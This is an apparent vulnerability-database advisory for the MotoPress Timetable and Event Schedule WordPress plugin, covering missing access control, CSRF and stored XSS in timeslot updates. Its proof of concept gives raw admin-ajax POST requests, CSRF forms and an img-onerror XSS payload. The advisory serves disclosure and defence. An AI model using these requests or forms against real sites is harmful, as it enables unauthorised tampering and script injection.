WordPress Plugin Vulnerabilities
Timetable and Event Schedule by MotoPress < 2.4.2 - Unauthorised Event TimeSlot Update
Description
The plugin does not have proper access control when updating a timeslot, allowing any user with the edit_posts capability (contributor+) to update arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be perform via CSRF against a logged in with such capability. In versions before 2.3.19, the lack of sanitisation and escaping in some of the fields, like the descritption could also lead to Stored XSS issues
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 191 Connection: close Cookie: [author+] controller=events&data%5Bid%5D=2&data%5Bdescription%5D=AttackerDescription&data%5Buser_id%5D=1&data%5Bweekday_ids%5D=1327&mptt_action=update_event_data&action=route_url Via CSRF: <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="controller" value="events" /> <input type="hidden" name="data[id]" value="2" /> <input type="hidden" name="data[description]" value="AttackerDescription" /> <input type="hidden" name="data[user_id]" value="1" /> <input type="hidden" name="data[weekday_ids]" value="1327" /> <input type="hidden" name="mptt_action" value="update_event_data" /> <input type="hidden" name="action" value="route_url" /> <input type="submit" value="Submit request" /> </form> </body> </html> XSS in v < 2.3.19 POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 189 Connection: close Cookie: [authpr+] controller=events&data%5Bid%5D=2&data%5Bdescription%5D=%3Cimg+src+onerror%3Dalert(%2FXSS%2F)%3E&data%5Buser_id%5D=1&data%5Bweekday_ids%5D=1327&mptt_action=update_event_data&action=route_url Via CSRF: <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="controller" value="events" /> <input type="hidden" name="data[id]" value="2" /> <input type="hidden" name="data[description]" value="<img src onerror=alert(/XSS/)>" /> <input type="hidden" name="data[user_id]" value="1" /> <input type="hidden" name="data[weekday_ids]" value="1327" /> <input type="hidden" name="mptt_action" value="update_event_data" /> <input type="hidden" name="action" value="route_url" /> <input type="submit" value="Submit request" /> </form> </body> </html> XSS will be trigged in the frontend when viewing the event, and backend when editing it
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-23 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-03-07 (about 2 years ago)